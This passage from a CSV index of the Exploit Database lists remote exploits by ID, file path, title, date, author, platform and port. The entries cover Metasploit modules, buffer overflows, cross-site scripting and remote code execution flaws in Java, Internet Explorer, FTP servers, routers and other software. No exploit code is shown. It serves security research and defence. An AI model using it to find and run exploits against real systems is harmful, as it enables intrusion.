Upload (Metasploit)",2013-08-15,Metasploit,remote,php,80 +27611,exploits/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",remote,windows, +27627,exploits/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,remote,windows, +27630,exploits/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,remote,linux, +27636,exploits/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - 'ads-readerext?actionID' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",remote,multiple, +27637,exploits/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - 'AlterCast?op' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",remote,multiple, +28056,exploits/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Unauthenticated Remote Heap Corruption",2013-09-03,kingcope,remote,hardware, +27703,exploits/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow",2013-08-19,Polunchis,remote,windows, +27704,exploits/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,remote,windows, +27705,exploits/multiple/remote/27705.rb,"Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,remote,multiple, +27706,exploits/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",remote,hardware, +27716,exploits/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure",2006-04-21,"Francois Harvey",remote,multiple, +27744,exploits/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",remote,windows, +27746,exploits/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,remote,windows, +27747,exploits/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (SEH)",2013-08-21,Wireghoul,remote,windows,21 +27752,exploits/unix/remote/27752.rb,"Graphite Web - Unsafe Pickle Handling (Metasploit)",2013-08-21,Metasploit,remote,unix, +27754,exploits/windows/remote/27754.txt,"Oracle Java - 'BytePackedRaster.verify()' Signed Integer Overflow",2013-08-21,"Packet Storm",remote,windows, +27758,exploits/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal",2006-04-28,Sowhat,remote,windows, +27759,exploits/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal",2006-04-28,Sowhat,remote,windows, +27760,exploits/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal",2006-04-28,Sowhat,remote,windows, +27801,exploits/linux/remote/27801.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 Request Routing Table Disclosure",2006-05-03,"Konstantin V. Gavrilenko",remote,linux, +27802,exploits/linux/remote/27802.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 RESPONSE Packet Route Injection",2006-05-03,"Konstantin V. Gavrilenko",remote,linux, +27805,exploits/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Persistent Cross-Site Scripting",2013-08-23,loneferret,remote,windows, +27820,exploits/windows/remote/27820.txt,"Cryptomathic - ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",remote,windows, +27830,exploits/hardware/remote/27830.java,"Cisco - WebSense Content Filtering Bypass",2006-05-08,"George D. Gal",remote,hardware, +33405,exploits/multiple/remote/33405.txt,"APC Network Management Card - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-15,"Jamal Pecou",remote,multiple, +27851,exploits/windows/remote/27851.bat,"Microsoft Windows - Path Conversion",2006-05-10,"Mario Ballano Bárcena",remote,windows, +27852,exploits/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage",2006-05-10,"Bernhard Mueller",remote,multiple, +27861,exploits/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting",2006-05-12,"David Maciejak",remote,asp, +27862,exploits/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/ToolResults.asp?sHostname' Cross-Site Scripting",2006-05-12,"David Maciejak",remote,asp, +27873,exploits/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)",2013-08-26,Aodrulez,remote,hardware, +27877,exploits/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,remote,windows,7770 +27887,exploits/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",remote,multiple, +27891,exploits/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",remote,hardware, +27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware, +27893,exploits/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware, +40382,exploits/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",remote,multiple, +27894,exploits/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware, +27902,exploits/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",remote,linux, +27923,exploits/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway - 'Login_error.SHTML' Cross-Site Scripting",2006-05-30,"Jaime Blasco",remote,hardware, +27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple, +27939,exploits/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution (Metasploit)",2013-08-29,Metasploit,remote,windows, +27940,exploits/windows/remote/27940.rb,"Mozilla Firefox - XMLSerializer Use-After-Free (Metasploit)",2013-08-29,Metasploit,remote,windows, +27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php, +27943,exploits/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",remote,windows, +27992,exploits/unix/remote/27992.txt,"FreeType - '.TTF' File Remote Buffer Overflow",2006-06-08,"Josh Bressers",remote,unix, +27984,exploits/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution",2006-06-13,"Will Dormann",remote,windows, +27986,exploits/windows/remote/27986.html,"Microsoft Internet Explorer 5.5/6.0/7.0 - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",remote,windows, +27987,exploits/linux/remote/27987.html,"Mozilla Firefox 1.x - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",remote,linux, +28005,exploits/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",remote,windows, +28007,exploits/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",remote,windows, +28030,exploits/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",remote,unix, +28081,exploits/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",remote,ios, +28082,exploits/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,remote,windows, +28083,exploits/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,remote,windows, +28118,exploits/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",remote,windows, +28170,exploits/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (SEH) (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",remote,windows,21 +28181,exploits/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",remote,linux, +28183,exploits/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,remote,windows, +28186,exploits/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",remote,windows, +28187,exploits/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,remote,windows, +28188,exploits/windows/remote/28188.rb,"HP SiteScope (Windows) - Remote Code Execution (Metasploit)",2013-09-10,Metasploit,remote,windows,8080 +28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows, +28198,exploits/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,remote,windows, +28209,exploits/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple, +28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple, +28224,exploits/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",remote,windows, +28225,exploits/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",remote,windows, +28226,exploits/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",remote,windows, +28235,exploits/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",remote,windows, +28245,exploits/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",remote,hardware, +28254,exploits/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",remote,multiple, +28284,exploits/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution",2013-09-15,blake,remote,windows, +28298,exploits/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",remote,windows, +28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple, +28314,exploits/linux/remote/28314.c,"BomberClone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",remote,linux, +28328,exploits/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",remote,windows,21 +28331,exploits/windows/remote/28331.txt,"Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption",2013-09-17,"Packet Storm",remote,windows, +28333,exploits/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution (Metasploit)",2013-09-17,Metasploit,remote,unix,49152 +28334,exploits/linux/remote/28334.rb,"Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit)",2013-09-17,Metasploit,remote,linux,443 +28336,exploits/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,remote,windows,443 +28337,exploits/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,remote,windows,443 +28344,exploits/multiple/remote/28344.txt,"DConnect Daemon - Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",remote,multiple, +28357,exploits/windows/remote/28357.asc,"Microsoft Windows XP/2000/2003 - Explorer Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",remote,windows, +28360,exploits/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",remote,windows, +28365,exploits/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",remote,multiple, +28368,exploits/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",remote,multiple, +28373,exploits/windows/remote/28373.txt,"Panda ActiveScan 5.53 - 'Ascan_6.asp' ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,remote,windows, +28374,exploits/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",remote,windows, +28376,exploits/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,remote,windows, +28397,exploits/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",remote,linux, +28398,exploits/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",remote,linux, +28400,exploits/windows/remote/28400.html,"Microsoft Internet Explorer 6 - 'TSUserEX.dll' ActiveX Control Memory Corruption",2006-08-17,nop,remote,windows, +28407,exploits/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,remote,php, +28408,exploits/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,remote,php, +28424,exploits/linux/remote/28424.txt,"Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",remote,linux, +28438,exploits/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,remote,windows, +28450,exploits/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",remote,hardware, +28481,exploits/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,remote,windows, +28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows, +28483,exploits/php/remote/28483.rb,"GLPI - 'install.php' Remote Command Execution (Metasploit)",2013-09-23,Metasploit,remote,php,80 +28484,exploits/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution (Metasploit)",2013-09-23,Metasploit,remote,hardware, +28489,exploits/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",remote,windows, +28500,exploits/windows/remote/28500.txt,"Microsoft Indexing Service - Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",remote,windows, +28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,remote,multiple, +28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware, +28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows, +28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPD Directory Traversal",2006-09-16,bug-finder,remote,linux, +28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",remote,multiple, +28639,exploits/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,remote,linux, +28640,exploits/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",remote,windows, +28641,exploits/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Arbitrary File Manipulation",2006-09-21,"Patrick Webster",remote,windows, +28642,exploits/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Replay Attack",2006-09-21,"Patrick Webster",remote,windows, +28643,exploits/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",remote,osx, +28725,exploits/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",remote,multiple, +28681,exploits/windows/remote/28681.rb,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (Metasploit)",2013-10-02,Metasploit,remote,windows,21 +28682,exploits/windows/remote/28682.rb,"Micorosft Internet Explorer - SetMouseCapture Use-After-Free (Metasploit)",2013-10-02,Metasploit,remote,windows, +28710,exploits/osx/remote/28710.txt,"Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",remote,osx, +28713,exploits/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution",2013-10-04,rgod,remote,php, +28724,exploits/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution (Metasploit)",2013-10-04,Metasploit,remote,windows, +28760,exploits/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,remote,php, +28765,exploits/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,remote,windows, +28766,exploits/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,remote,windows, +28809,exploits/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit)",2013-10-08,Metasploit,remote,windows,443 +28810,exploits/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,remote,unix, +28835,exploits/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",remote,novell, +28836,exploits/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,remote,novell, +28837,exploits/novell/remote/28837.rb,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (3)",2006-10-30,MC,remote,novell, +28847,exploits/hardware/remote/28847.txt,"D-Link DSL-G624T - Information Disclosure",2006-10-23,jose.palanco,remote,hardware, +28848,exploits/hardware/remote/28848.txt,"INCA IM-204 - Information Disclosure",2006-10-23,Crackers_Child,remote,hardware, +28849,exploits/windows/remote/28849.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal",2006-10-24,"Tan Chew Keong",remote,windows, +28850,exploits/windows/remote/28850.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",remote,windows, +28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows, +28876,exploits/windows/remote/28876.html,"Microsoft Internet Explorer 6 - Code Execution (1)",2006-10-30,"Michal Bucko",remote,windows, +28877,exploits/windows/remote/28877.html,"Microsoft Internet Explorer 6 - Code Execution (2)",2006-10-30,"Michal Bucko",remote,windows, +28884,exploits/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,remote,windows, +28887,exploits/java/remote/28887.txt,"Sun Java System 6.x - Messenger Express Cross-Site Scripting",2006-10-31,Handrix,remote,java, +28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware, +28916,exploits/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",remote,windows, +28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple, +28968,exploits/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,remote,windows, +28973,exploits/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,remote,windows, +28974,exploits/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,remote,windows, +28981,exploits/multiple/remote/28981.txt,"IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting",2006-11-13,"Nuri Fattah",remote,multiple, +28987,exploits/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,remote,multiple, +29032,exploits/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",remote,windows, +29033,exploits/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",remote,linux, +29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,remote,windows, +29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",remote,windows, +29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",remote,windows, +29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows, +29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,remote,hardware,80 +29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,remote,windows,12397 +29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,remote,windows,8080 +29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,remote,unix,80 +29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",remote,linux, +29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",remote,windows, +29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows, +29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,remote,windows, +29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,remote,php,80 +29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080 +29281,exploits/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",remote,windows, +29290,exploits/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,remote,php,80 +29302,exploits/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,remote,linux, +29316,exploits/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner",2013-10-31,noptrix,remote,php, +29319,exploits/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29320,exploits/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29321,exploits/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 +29322,exploits/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +29323,exploits/linux/remote/29323.rb,"OpenMediaVault Cron - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 +29324,exploits/linux/remote/29324.rb,"Moodle - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,remote,linux,80 +29325,exploits/php/remote/29325.rb,"ProcessMaker Open Source - Authenticated PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80 +30186,exploits/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",remote,linux, +29371,exploits/multiple/remote/29371.txt,"Oracle 10g Portal - 'Key' Cross-Site Scripting",2006-12-29,"Pham Duc Hai",remote,multiple, +29383,exploits/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Cross-Site Scripting",2007-01-03,"Stefano Di Paola",remote,linux, +29475,exploits/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",remote,multiple, +29400,exploits/novell/remote/29400.txt,"Novell Access Manager 3 Identity Server - 'IssueInstant' Cross-Site Scripting",2007-01-08,anonymous,remote,novell, +29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple, +29448,exploits/osx/remote/29448.txt,"Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,remote,osx, +29449,exploits/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",remote,multiple, +29513,exploits/linux/remote/29513.rb,"VICIdial Manager - Send OS Command Injection (Metasploit)",2013-11-08,Metasploit,remote,linux,80 +29471,exploits/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",remote,linux, +29490,exploits/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,remote,windows, +29496,exploits/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",remote,linux, +30037,exploits/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",remote,windows, +30038,exploits/windows/remote/30038.txt,"Caucho Resin 3.1 - '/web-inf' Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",remote,windows, +30043,exploits/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",remote,linux, +30045,exploits/windows/remote/30045.html,"PrecisionID Barcode - 'PrecisionID_Barcode.dll' ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,remote,windows, +30049,exploits/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,remote,windows, +30052,exploits/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",remote,multiple, +30016,exploits/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",remote,windows, +30018,exploits/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",remote,linux, +30019,exploits/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution",2007-05-09,binagres,remote,windows, +30025,exploits/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",remote,multiple, +30026,exploits/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Directory Traversal",2007-05-11,"Digital Defense",remote,windows, +29524,exploits/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,remote,windows, +29527,exploits/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",remote,linux, +29538,exploits/windows/remote/29538.c,"SSC DiskAccess NFS Client - 'DAPCNFSD.dll' Remote Stack 